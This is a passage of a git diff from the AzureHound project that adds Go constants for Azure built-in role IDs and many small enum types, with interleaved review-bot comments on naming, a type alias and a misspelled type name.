+ SchemaRegistryContributorRoleID string = "5dffeca3-4936-4216-b2bc-10343a5abb25" + + // Read and list Schema Registry groups and schemas. + SchemaRegistryReaderRoleID string = "2c56ea50-c6b3-40a6-83c0-9d98858bc7d2" + + // Grants full access to Azure Cognitive Search index data. + SearchIndexDataContributorRoleID string = "8ebe5a00-799e-43f5-93ac-243d3dce84a7" + + // Grants read access to Azure Cognitive Search index data. + SearchIndexDataReaderRoleID string = "1407120a-92aa-4202-b7e9-c0e197c71c8f" + + // Lets you manage Search services, but not access to them. + SearchServiceContributorRoleID string = "7ca78c08-252a-4471-8644-bb5ff32d4ba0" + + // Security Admin Role + SecurityAdminRoleID string = "fb1c8493-542b-48eb-b624-b4c8fea62acd" + + // Lets you push assessments to Security Center + SecurityAssessmentContributorRoleID string = "612c2aa1-cb24-443b-ac28-3ab7272de6f5" + + // Allowed to publish and modify platforms, workflows and toolsets to Security Detonation Chamber + SecurityDetonationChamberPublisherRoleID string = "352470b3-6a9c-4686-b503-35deb827e500" + + // Allowed to query submission info and files from Security Detonation Chamber + SecurityDetonationChamberReaderRoleID string = "28241645-39f8-410b-ad48-87863e2951d5" + + // Allowed to create and manage submissions to Security Detonation Chamber + SecurityDetonationChamberSubmissionManagerRoleID string = "a37b566d-3efa-4beb-a2f2-698963fa42ce" + + // Allowed to create submissions to Security Detonation Chamber + SecurityDetonationChamberSubmitterRoleID string = "0b555d9b-b4a7-4f43-b330-627f0e5be8f0" + + // This is a legacy role. Please use Security Administrator instead + SecurityManagerLegacyRoleID string = "e3d13bf0-dd5a-482e-ba6b-9b8433878d10" + + // Security Reader Role + SecurityReaderARMRoleID string = "39bc4728-0917-49c7-9d2c-d95423bc2eb4" + + // Services Hub Operator allows you to perform all read, write, and deletion operations related to Services Hub Connectors. 
+ ServicesHubOperatorRoleID string = "82200a5b-e217-47a5-b665-6d8765ee745b" + + // Read SignalR Service Access Keys + SignalRAccessKeyReaderRoleID string = "04165923-9d83-45d5-8227-78b77b0a687e" + + // Lets your app server access SignalR Service with AAD auth options. + SignalRAppServerRoleID string = "420fcaa2-552c-430f-98ca-3264be4806c7" + + // Full access to Azure SignalR Service REST APIs + SignalRRESTAPIOwnerRoleID string = "fd53cd77-2268-407a-8f46-7e7863d0f521" + + // Read-only access to Azure SignalR Service REST APIs + SignalRRESTAPIReaderRoleID string = "ddde6b66-c0df-4114-a159-3618637b3035" + + // Full access to Azure SignalR Service REST APIs + SignalRServiceOwnerRoleID string = "7e4f1700-ea5a-4f59-8f37-079cfe29dce3" + + // Create, Read, Update, and Delete SignalR service resources + SignalRWebPubSubContributorRoleID string = "8cf5e20a-e4b2-4e9d-b3a1-5ceb692c2761" + + // Lets you manage Site Recovery service except vault creation and role assignment + SiteRecoveryContributorRoleID string = "6670b86e-a3f7-4917-ac9b-5d6ab1be4567" + + // Lets you failover and failback but not perform other Site Recovery management operations + SiteRecoveryOperatorRoleID string = "494ae006-db33-4328-bf46-533a6560a3ca" + + // Lets you view Site Recovery status but not perform other management operations + SiteRecoveryReaderRoleID string = "dbaa88c4-0c30-4179-9fb3-46319faa6149" + + // Lets you manage spatial anchors in your account, but not delete them + SpatialAnchorsAccountContributorRoleID string = "8bbe83f1-e2a6-4df7-8cb4-4e04d4e5c827" + + // Lets you manage spatial anchors in your account, including deleting them + SpatialAnchorsAccountOwnerRoleID string = "70bbe301-9835-447d-afdd-19eb3167307c" + + // Lets you locate and read properties of spatial anchors in your account + SpatialAnchorsAccountReaderRoleID string = "5d51204f-eb77-4b1c-b86a-2ec626c49413" + + // Lets you perform backup and restore operations using Azure Backup on the storage account. 
+ StorageAccountBackupContributorRoleID string = "e5e2a7ff-d759-4cd2-bb51-3152d37e2eb1" + + // Lets you manage storage accounts, including accessing storage account keys which provide full access to storage account data. + StorageAccountContributorRoleID string = "17d1049b-9a84-46fb-8f53-869881c3d3ab" + + // Storage Account Key Operators are allowed to list and regenerate keys on Storage Accounts + StorageAccountKeyOperatorServiceRoleID string = "81a9662b-bebf-436f-a333-f67b29880f12" + + // Allows for read, write and delete access to Azure Storage blob containers and data + StorageBlobDataContributorRoleID string = "ba92f5b4-2d11-453d-a403-e96b0029c9fe" + + // Allows for full access to Azure Storage blob containers and data, including assigning POSIX access control. + StorageBlobDataOwnerRoleID string = "b7e6dc6d-f1e8-4753-8033-0f276bb0955b" + + // Allows for read access to Azure Storage blob containers and data + StorageBlobDataReaderRoleID string = "2a2b9908-6ea1-4ae2-8e65-a410df84e7d1" + + // Allows for generation of a user delegation key which can be used to sign SAS tokens + StorageBlobDelegatorRoleID string = "db58b8e5-c6ad-4a2a-8342-4190687cbf4a" + + // Allows for read, write, and delete access in Azure Storage file shares over SMB + StorageFileDataSMBShareContributorRoleID string = "0c867c2a-1d8c-454a-a3db-ab2ea1bdc8bb" + + // Allows for read, write, delete and modify NTFS permission access in Azure Storage file shares over SMB + StorageFileDataSMBShareElevatedContributorRoleID string = "a7264617-510b-434b-a828-9731dc254ea7" + + // Allows for read access to Azure File Share over SMB + StorageFileDataSMBShareReaderRoleID string = "aba4ae5f-2193-4029-9191-0cb91df5e314" + + // Allows for read, write, and delete access to Azure Storage queues and queue messages + StorageQueueDataContributorRoleID string = "974c5e8b-45b9-4653-ba55-5f855dd0fb88" + + // Allows for peek, receive, and delete access to Azure Storage queue messages + 
StorageQueueDataMessageProcessorRoleID string = "8a0f0c08-91a1-4084-bc3d-661d67233fed" + + // Allows for sending of Azure Storage queue messages + StorageQueueDataMessageSenderRoleID string = "c6a89b2d-59bc-44d0-9896-0f6e12d7b80a" + + // Allows for read access to Azure Storage queues and queue messages + StorageQueueDataReaderRoleID string = "19e7f393-937e-4f77-808e-94535e297925" + + // Allows for read, write and delete access to Azure Storage tables and entities + StorageTableDataContributorRoleID string = "0a9a7e1f-b9d0-4cc4-a60d-0319b160aaa3" + + // Allows for read access to Azure Storage tables and entities + StorageTableDataReaderRoleID string = "76199698-9eea-4c19-bc75-cec21354c6b6" + + // Lets you perform query testing without creating a stream analytics job first + StreamAnalyticsQueryTesterRoleID string = "1ec5b3c1-b17e-4e25-8312-2acb3c3c5abf" + + // Lets you create and manage Support requests + SupportRequestContributorRoleID string = "cfd33db0-3dd1-45e3-aa9d-cdbdf3b6f24e" + + // Lets you manage tags on entities, without providing access to the entities themselves. + TagContributorRoleID string = "4a9ae827-6dc8-4573-8ac7-8239d42aa03f" + + // Let you view and download packages and test results. + TestBaseReaderRoleID string = "15e0f5a1-3450-4248-8e25-e2afe88a9e85" + + // Lets you manage Traffic Manager profiles, but does not let you control who has access to them. + TrafficManagerContributorRoleID string = "a4b10055-b0c7-44c2-b00f-c7b5b3550cf7" + + // Lets you manage user access to Azure resources. + UserAccessAdminRoleID string = "18d7d88d-d35e-4fb5-a5c3-7773c20a72d9" + + // Role that provides access to disk snapshot for security analysis. + VMScannerOperatorRoleID string = "d24ecba3-c1f4-40fa-a7bb-4588a071e8fd" + + // Has access to view and search through all video's insights and transcription in the Video Indexer portal. No access to model customization, embedding of widget, downloading videos, or sharing the account. 
+ VideoIndexerRestrictedViewerRoleID string = "a2c4a527-7dc0-4ee3-897b-403ade70fafb" + + // View Virtual Machines in the portal and login as administrator + VirtualMachineAdministratorLoginRoleID string = "1c0163c0-47e6-4577-8991-ea5c82e286e4" + + // Deprecated. Use VirtualMachineAdministratorLoginRoleID instead. + AdminLoginRoleID string = "1c0163c0-47e6-4577-8991-ea5c82e286e4" + + // Lets you manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to. + VirtualMachineContributorRoleID string = "9980e02c-c2be-4d73-94e8-173b1dc7cf3c" + + // View Virtual Machines in the portal and login as a local user configured on the arc server + VirtualMachineLocalUserLoginRoleID string = "602da2ba-a5c2-41da-b01d-5360126ab525" + + // View Virtual Machines in the portal and login as a regular user. + VirtualMachineUserLoginRoleID string = "fb879df8-f326-4884-b1cf-06f3ad86be52" + + // Lets you manage the web plans for websites, but not access to them. + WebPlanContributorRoleID string = "2cc479cb-7b4d-49a8-b449-8c00fd0f0a4b" + + // Full access to Azure Web PubSub Service REST APIs + WebPubSubServiceOwnerRoleID string = "12cf5a90-567b-43ae-8102-96cf46c7d9b4" + + // Read-only access to Azure Web PubSub Service REST APIs + WebPubSubServiceReaderRoleID string = "bfb1c7d2-fb1a-466b-b2ba-aee63b92deaf" + + // Lets you manage websites (not web plans), but not access to them. + WebsiteContributorRoleID string = "de139f84-1756-47ae-9be6-808fbbe84772" + + // Let's you manage the OS of your resource via Windows Admin Center as an administrator. + WindowsAdminCenterAdministratorLoginRoleID string = "a6333a3e-0164-44c3-b281-7a577aff287f" + + // Can save shared workbooks. + WorkbookContributorRoleID string = "e8ddcd69-c73f-4f9f-9844-4100522f16ad" + + // Can read workbooks. + WorkbookReaderRoleID string = "b279062a-9be3-42a0-92ae-8b3cf002ec4d" + + // WorkloadBuilder Migration Agent Role. 
+ WorkloadBuilderMigrationAgentRoleID string = "d17ce0a2-0697-43bc-aac5-9113337ab61c"
+)
diff --git a/enums/accesstype.go b/enums/accesstype.go
new file mode 100644
index 0000000..a362387
--- /dev/null
+++ b/enums/accesstype.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AccessType string
+
+const (
+ AccessTypeScope AccessType = "Scope"
+ AccessTypeRole AccessType = "Role"
+)
diff --git a/enums/account_immutability_policy_state.go b/enums/account_immutability_policy_state.go
new file mode 100644
index 0000000..29c437a
--- /dev/null
+++ b/enums/account_immutability_policy_state.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AccountImmutabilityPolicyState string
+
+const (
+ DisabledState AccountImmutabilityPolicyState = "Disabled"
+ LockedState AccountImmutabilityPolicyState = "Locked"
+ UnlockedState AccountImmutabilityPolicyState = "Unlocked"
+)
diff --git a/enums/agegroup.go b/enums/agegroup.go
new file mode 100644
index 0000000..8bdd519
--- /dev/null
+++ b/enums/agegroup.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AgeGroup string
+
+const (
+ AgeGroupMinor AgeGroup = "minor"
+ AgeGroupNotAdult AgeGroup = "notAdult"
+ AgeGroupAdult AgeGroup = "adult"
+)
diff --git a/enums/allowedcopyscope.go b/enums/allowedcopyscope.go
new file mode 100644
index 0000000..aee00fe
--- /dev/null
+++ b/enums/allowedcopyscope.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AllowedCopyScope string
+
+const (
+ AADScope AllowedCopyScope = "AAD"
+ PrivateLinkScope AllowedCopyScope = "PrivateLink"
+)
diff --git a/enums/auth-method.go b/enums/auth-method.go
new file mode 100644
index 0000000..7801685
--- /dev/null
+++ b/enums/auth-method.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AuthMethod = string
+
+const (
+ Certificate string = "Certificate"
+ Secret string = "Client Secret"
+ UsernamePassword string = "Username and Password"
+)
+
+func AuthMethods() []AuthMethod {
+ return []AuthMethod{
+ Certificate,
+ Secret,
+ UsernamePassword,
+ }
+}
diff --git a/enums/auto_heal_action_type.go b/enums/auto_heal_action_type.go
new file mode 100644
index 0000000..1a8021c
--- /dev/null
+++ b/enums/auto_heal_action_type.go
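Review bot: In enums/auth-method.go, `type AuthMethod = string` is an alias rather than a defined type, and the three constants are declared as plain `string`, so the compiler accepts any string wherever an `AuthMethod` is expected. Every other enum added in this commit uses a defined type (`type AccessType string`), so the value that selects which credential type is used is the one with the least checking. If the alias is deliberate, presumably so `AuthMethods()` can be handed to something that wants `[]string`, add a comment saying so and validate the chosen value against `AuthMethods()` where it is read; otherwise use `type AuthMethod string` with `Certificate AuthMethod = "Certificate"`. The exported names `Certificate`, `Secret` and `UsernamePassword` are also unprefixed in the shared `enums` package, so `AuthMethodCertificate` and so on would match `AccessTypeScope` and avoid collisions.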
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AutoHealActionType string
+
+const (
+ CustomActionType AutoHealActionType = "CustomAction"
+ LogEventActionType AutoHealActionType = "LogEvent"
+ RecycleActionType AutoHealActionType = "Recycle"
+)
diff --git a/enums/automation_account_identity_type.go b/enums/automation_account_identity_type.go
new file mode 100644
index 0000000..1f1c970
--- /dev/null
+++ b/enums/automation_account_identity_type.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AutomationAccountIdentityType string
+
+const (
+ ApplicationIdentityType AutomationAccountIdentityType = "Application"
+ KeyIdentityType AutomationAccountIdentityType = "Key"
+ ManagedIdentityType AutomationAccountIdentityType = "ManagedIdentity"
+ UserIdentityType AutomationAccountIdentityType = "User"
+)
diff --git a/enums/automation_account_state.go b/enums/automation_account_state.go
new file mode 100644
index 0000000..767fa71
--- /dev/null
+++ b/enums/automation_account_state.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AutomationAccountState string
+
+const (
+ OkState AutomationAccountState = "Ok"
+ SuspendedState AutomationAccountState = "Suspended"
+ UnavailableState AutomationAccountState = "Unavailable"
+)
diff --git a/enums/autoreplystatus.go b/enums/autoreplystatus.go
new file mode 100644
index 0000000..99aba3b
--- /dev/null
+++ b/enums/autoreplystatus.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AutoReplyStatus string
+
+const (
+ AutoReplyStatusDisabled AutoReplyStatus = "disabled"
+ AutoReplyStatusAlwaysEnabled AutoReplyStatus = "alwaysEnabled"
+ AutoReplyStatusScheduled AutoReplyStatus = "scheduled"
+)
diff --git a/enums/azure_storage_state.go b/enums/azure_storage_state.go
new file mode 100644
index 0000000..be27526
--- /dev/null
+++ b/enums/azure_storage_state.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AzureStorageState string
+
+const (
+ InvalidCredentialsStorageState AzureStorageState = "InvalidCredentials"
+ InvalidShareStorageState AzureStorageState = "InvalidShare"
+ NotValidatedStorageState AzureStorageState = "NotValidated"
+ OkStorageState AzureStorageState = "Ok"
+)
diff --git a/enums/azure_storage_type.go b/enums/azure_storage_type.go
new file mode 100644
index 0000000..db8c142
--- /dev/null
+++ b/enums/azure_storage_type.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type AzureStorageType string
+
+const (
+ AzureBlobStorageType AzureStorageType = "AzureBlob"
+ AzureFilesStorageType AzureStorageType = "AzureFiles"
+)
diff --git a/enums/blob_restore_progress_status.go b/enums/blob_restore_progress_status.go
new file mode 100644
index 0000000..1215fb6
--- /dev/null
+++ b/enums/blob_restore_progress_status.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type BlobRestoreProgressStatus string
+
+const (
+ CompletedStatus BlobRestoreProgressStatus = "Complete"
+ FailedStatus BlobRestoreProgressStatus = "Failed"
+ InProgress BlobRestoreProgressStatus = "InProgress"
+)
diff --git a/enums/bypassoption.go b/enums/bypassoption.go
new file mode 100644
index 0000000..917799d
--- /dev/null
+++ b/enums/bypassoption.go
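Review bot: The three constants in enums/blob_restore_progress_status.go do not follow one naming pattern: `CompletedStatus` and `FailedStatus` carry a suffix, `InProgress` is bare, and none of them names the type it belongs to. Every file in this patch shares the flat `enums` package, so bare exported names such as `InProgress` here, `Enabled`/`Disabled` in generic_enabled_disabled.go and `Unavailable` in geo_replication_status.go are easy to use for the wrong enum and will collide with the next type that needs the same word. I would prefix them with the type name, e.g. `BlobRestoreProgressStatusInProgress BlobRestoreProgressStatus = "InProgress"`, the way dayofweek.go and deviceprofile.go already do.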
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Tells what traffic can bypass network rules. This can be 'AzureServices' or 'None'.
+// If not specified the default is 'AzureServices'.
+type BypassOption string
+
+const (
+ BypassOptionAzureServices BypassOption = "AzureServices"
+ BypassOptionNone BypassOption = "None"
+)
diff --git a/enums/capabiltystatus.go b/enums/capabiltystatus.go
new file mode 100644
index 0000000..1e7c311
--- /dev/null
+++ b/enums/capabiltystatus.go
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type CapabiltyStatus string
+
+const (
+ // Available for normal use.
+ CapabiltyStatusEnabled CapabiltyStatus = "Enabled"
+
+ // Available for normal use but is in a grace period.
+ CapabiltyStatusWarning CapabiltyStatus = "Warning"
+
+ // Unavailable but any data associated with the capability must be preserved.
+ CapabiltyStatusSuspended CapabiltyStatus = "Suspended"
+
+ // Unavailable and any data associated with the capability may be deleted.
+ CapabiltyStatusDeleted CapabiltyStatus = "Deleted"
+
+ // Unavailable for all administrators and users but any data associated with the capability must be preserved.
+ CapabiltyStatusLockedOut CapabiltyStatus = "LockedOut"
+)
diff --git a/enums/client_cert_mode.go b/enums/client_cert_mode.go
new file mode 100644
index 0000000..208aae2
--- /dev/null
+++ b/enums/client_cert_mode.go
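Review bot: The exported type `CapabiltyStatus`, its five `CapabiltyStatus…` constants and the file name enums/capabiltystatus.go all misspell "Capability". Once other packages import these names the spelling becomes part of the API and a later correction is a breaking rename, so it is cheapest to fix in the commit that introduces the file: `type CapabilityStatus string`, `CapabilityStatusEnabled CapabilityStatus = "Enabled"` and so on, with the file renamed to match. The type also has no doc comment, although its constants do; a line such as `// CapabilityStatus is the availability state of a capability.` would cover it.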
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ClientCertMode string
+
+const (
+ OptionalClientCertMode ClientCertMode = "Optional"
+ OptionalInteractiveUserClientCertMode ClientCertMode = "OptionalInteractiveUser"
+ RequiredClientCertMode ClientCertMode = "Required"
+)
diff --git a/enums/connection_string_type.go b/enums/connection_string_type.go
new file mode 100644
index 0000000..b5be93e
--- /dev/null
+++ b/enums/connection_string_type.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ConnectionStringType string
+
+const (
+ ApiHubConnectionStringType ConnectionStringType = "ApiHub"
+ CustomConnectionStringType ConnectionStringType = "Custom"
+ DocDbConnectionStringType ConnectionStringType = "DocDb"
+ EventHubConnectionStringType ConnectionStringType = "EventHub"
+ MySqlConnectionStringType ConnectionStringType = "MySql"
+ NotificationHubConnectionStringType ConnectionStringType = "NotificationHub"
+ PostgreSQLConnectionStringType ConnectionStringType = "PostgreSQL"
+ RedisCacheConnectionStringType ConnectionStringType = "RedisCache"
+ SQLAzureConnectionStringType ConnectionStringType = "SQLAzure"
+ SQLServerConnectionStringType ConnectionStringType = "SQLServer"
+ ServiceBusConnectionStringType ConnectionStringType = "ServiceBus"
+)
diff --git a/enums/consentforminor.go b/enums/consentforminor.go
new file mode 100644
index 0000000..eff3138
--- /dev/null
+++ b/enums/consentforminor.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ConsentForMinor string
+
+const (
+ // Consent has been obtained for the user to have an account.
+ ConsentForMinorGranted ConsentForMinor = "granted"
+
+ // Consent has not been obtained for the user to have an account.
+ ConsentForMinorDenied ConsentForMinor = "denied"
+
+ // The user is from a location that does not require consent.
+ ConsentForMinorNotRequired ConsentForMinor = "notRequired"
+)
diff --git a/enums/createmode.go b/enums/createmode.go
new file mode 100644
index 0000000..cb8fd09
--- /dev/null
+++ b/enums/createmode.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// The vault's create mode to indicate whether the vault need to be recovered or not.
+type CreateMode string
+
+const (
+ CreateModeDefault CreateMode = "default"
+ CreateModeRecover CreateMode = "recover"
+)
diff --git a/enums/creationtype.go b/enums/creationtype.go
new file mode 100644
index 0000000..2b561ac
--- /dev/null
+++ b/enums/creationtype.go
@@ -0,0 +1,35 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type CreationType string
+
+const (
+ // User was created as an external account.
+ CreationTypeInvitation CreationType = "Invitation"
+
+ // User was created as a local account for an Azure AD B2C tenant.
+ CreationTypeLocalAccount CreationType = "LocalAccount"
+
+ // User was created through self-service sign-up by an internal user using email verification.
+ CreationTypeEmailVerified CreationType = "EmailVerified"
+
+ // User was created through self-service sign-up by an external user signing up through a link that is part of a
+ // user flow.
+ CreationTypeSelfServiceSignUp CreationType = "SelfServiceSignUp"
+)
